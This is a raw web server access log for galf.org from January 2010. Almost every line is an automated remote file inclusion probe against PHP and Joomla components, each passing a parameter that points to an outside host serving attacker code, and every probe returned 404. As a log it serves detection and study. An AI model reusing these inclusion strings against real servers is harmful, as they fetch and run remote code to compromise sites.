143.248.176.79 - - [25/Jan/2010:00:53:01 -0800] "GET /write_update.php?board_skin_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
143.248.176.79 - - [25/Jan/2010:00:53:01 -0800] "GET /logs/write_update.php?board_skin_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
216.7.173.20 - - [25/Jan/2010:00:53:38 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://epvs.ru/project_files/11_78.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.7.173.20 - - [25/Jan/2010:00:53:38 -0800] "GET /logs/access_090720.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://epvs.ru/project_files/11_78.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.7.173.20 - - [25/Jan/2010:00:53:38 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://epvs.ru/project_files/11_78.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.7.173.20 - - [25/Jan/2010:00:53:42 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://epvs.ru/project_files/11_78.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.7.173.20 - - [25/Jan/2010:00:53:42 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://epvs.ru/project_files/11_78.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.7.173.20 - - [25/Jan/2010:00:53:42 -0800] "GET /logs/access_090720.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://epvs.ru/project_files/11_78.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.7.173.20 - - [25/Jan/2010:00:53:47 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://epvs.ru/project_files/11_78.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.7.173.20 - - [25/Jan/2010:00:53:47 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://epvs.ru/project_files/11_78.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.7.173.20 - - [25/Jan/2010:00:53:47 -0800] "GET /logs/access_090720.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://epvs.ru/project_files/11_78.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.7.173.20 - - [25/Jan/2010:00:54:17 -0800] "GET /logs/access_091116.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://epvs.ru/project_files/11_78.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:01:01:00 -0800] "GET /bbs/delete_all.php?board_skin_path=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:01:01:01 -0800] "GET /logs/bbs/delete_all.php?board_skin_path=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:01:01:01 -0800] "GET /logs/access.log/bbs/delete_all.php?board_skin_path=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:01:05 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:01:05 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:01:05 -0800] "GET /logs/access_090810.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:01:01:44 -0800] "GET /administrator/components//bbs///admin.remository.php?board_skin_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:01:01:44 -0800] "GET /logs/administrator/components//bbs///admin.remository.php?board_skin_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:01:01:44 -0800] "GET /logs/access_091214.log%20%20/administrator/components//bbs///admin.remository.php?board_skin_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:01:47 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:01:47 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:01:48 -0800] "GET /logs/access_090810.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:02:32 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:02:32 -0800] "GET /logs/access_090810.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:02:32 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:02:52 -0800] "GET /logs/access_090713.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:03:05 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:03:05 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:03:08 -0800] "GET /logs/access_090713.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:03:23 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:03:23 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:03:23 -0800] "GET /logs/access_100104.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.176.79 - - [25/Jan/2010:01:03:33 -0800] "GET /logs/access.log/write_update.php?board_skin_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.176.79 - - [25/Jan/2010:01:03:33 -0800] "GET /write_update.php?board_skin_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.176.79 - - [25/Jan/2010:01:03:33 -0800] "GET /logs/write_update.php?board_skin_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:03:43 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:03:43 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:03:43 -0800] "GET /logs/access_090720.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:03:45 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:03:45 -0800] "GET /logs/access_090720.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:03:45 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:01:03:57 -0800] "GET /logs/access.log%20%20/bbs/delete_all.php?board_skin_path=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:04:23 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:04:23 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:04:23 -0800] "GET /logs/access_100104.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.254.168.4 - - [25/Jan/2010:01:04:49 -0800] "GET /logs//login.php?dir=http://ricajupanu.go.ro/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
121.254.168.4 - - [25/Jan/2010:01:04:49 -0800] "GET /logs/access.log%20%20//login.php?dir=http://ricajupanu.go.ro/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
121.254.168.4 - - [25/Jan/2010:01:04:49 -0800] "GET /login.php?dir=http://ricajupanu.go.ro/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
119.63.198.43 - - [25/Jan/2010:01:06:43 -0800] "GET / HTTP/1.1" 200 1048 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:01:08:43 -0800] "GET /logs/access_100118.log%20%20/bbs/delete_all.php?board_skin_path=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [25/Jan/2010:01:10:25 -0800] "GET /logs//inc/header.php/step_one.php?server_inc=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [25/Jan/2010:01:10:25 -0800] "GET /inc/header.php/step_one.php?server_inc=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [25/Jan/2010:01:10:25 -0800] "GET /logs/access_090914.log%20%20//inc/header.php/step_one.php?server_inc=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [25/Jan/2010:01:10:25 -0800] "GET /logs/access_100111.log%20%20//inc/header.php/step_one.php?server_inc=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [25/Jan/2010:01:10:30 -0800] "GET /logs//inc/header.php/step_one.php?server_inc=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [25/Jan/2010:01:10:30 -0800] "GET /inc/header.php/step_one.php?server_inc=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [25/Jan/2010:01:10:30 -0800] "GET /logs/access_090914.log%20%20//inc/header.php/step_one.php?server_inc=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [25/Jan/2010:01:10:30 -0800] "GET /logs/access_100111.log%20%20//inc/header.php/step_one.php?server_inc=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [25/Jan/2010:01:10:43 -0800] "GET /administrator/components//bbs///admin.remository.php?board_skin_path=http://www.raygina.de/cms/son??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [25/Jan/2010:01:10:43 -0800] "GET /logs/administrator/components//bbs///admin.remository.php?board_skin_path=http://www.raygina.de/cms/son??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [25/Jan/2010:01:10:43 -0800] "GET /logs/access_091214.log%20%20/administrator/components//bbs///admin.remository.php?board_skin_path=http://www.raygina.de/cms/son??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [25/Jan/2010:01:11:31 -0800] "GET /logs/access_090914.log//inc/header.php/step_one.php?server_inc=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [25/Jan/2010:01:11:36 -0800] "GET /logs/access_090914.log//inc/header.php/step_one.php?server_inc=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [25/Jan/2010:01:11:55 -0800] "GET /logs/access_090629.log//inc/header.php/step_one.php?server_inc=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [25/Jan/2010:01:11:57 -0800] "GET /logs/access_090629.log//inc/header.php/step_one.php?server_inc=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:01:13:03 -0800] "GET /administrator/components//bbs///admin.remository.php?board_skin_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:01:13:03 -0800] "GET /logs/administrator/components//bbs///admin.remository.php?board_skin_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:01:13:03 -0800] "GET /logs/access_090720.log/administrator/components//bbs///admin.remository.php?board_skin_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:13:09 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:13:09 -0800] "GET /logs/access_090727.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:13:09 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:13:09 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:13:09 -0800] "GET /logs/access_090727.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:13:09 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [25/Jan/2010:01:13:16 -0800] "GET /logs/access_091019.log%20%20/administrator/components//bbs///admin.remository.php?board_skin_path=http://www.raygina.de/cms/son??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:13:21 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:13:21 -0800] "GET /logs/access_090727.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:13:21 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [25/Jan/2010:01:15:37 -0800] "GET /logs/administrator/components//bbs///admin.remository.php?board_skin_path=http://www.raygina.de/cms/son??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [25/Jan/2010:01:15:37 -0800] "GET /administrator/components//bbs///admin.remository.php?board_skin_path=http://www.raygina.de/cms/son??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [25/Jan/2010:01:15:37 -0800] "GET /logs/access_090720.log/administrator/components//bbs///admin.remository.php?board_skin_path=http://www.raygina.de/cms/son??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:16:16 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:16:16 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:16:16 -0800] "GET /logs/access_091019.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:17:02 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:17:02 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:17:02 -0800] "GET /logs/access_091019.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:19:15 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:19:15 -0800] "GET /logs/access_090817.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:19:15 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:19:15 -0800] "GET /logs/access_090706.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:19:38 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:19:38 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:19:38 -0800] "GET /logs/access_090817.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:19:38 -0800] "GET /logs/access_090706.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:19:47 -0800] "GET /logs/access_090817.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:19:47 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:19:47 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:19:47 -0800] "GET /logs/access_090706.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.46.199.201 - - [25/Jan/2010:01:20:13 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:22:16 -0800] "GET /logs/access_090817.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:22:16 -0800] "GET /logs/access_090706.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:22:22 -0800] "GET /logs/access_090817.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:22:22 -0800] "GET /logs/access_090706.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:22:40 -0800] "GET /logs/access_090706.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:22:40 -0800] "GET /logs/access_090817.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.237.238.234 - - [25/Jan/2010:01:22:54 -0800] "GET /logs/access_090629.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.237.238.234 - - [25/Jan/2010:01:22:54 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.237.238.234 - - [25/Jan/2010:01:22:54 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.237.238.234 - - [25/Jan/2010:01:23:03 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
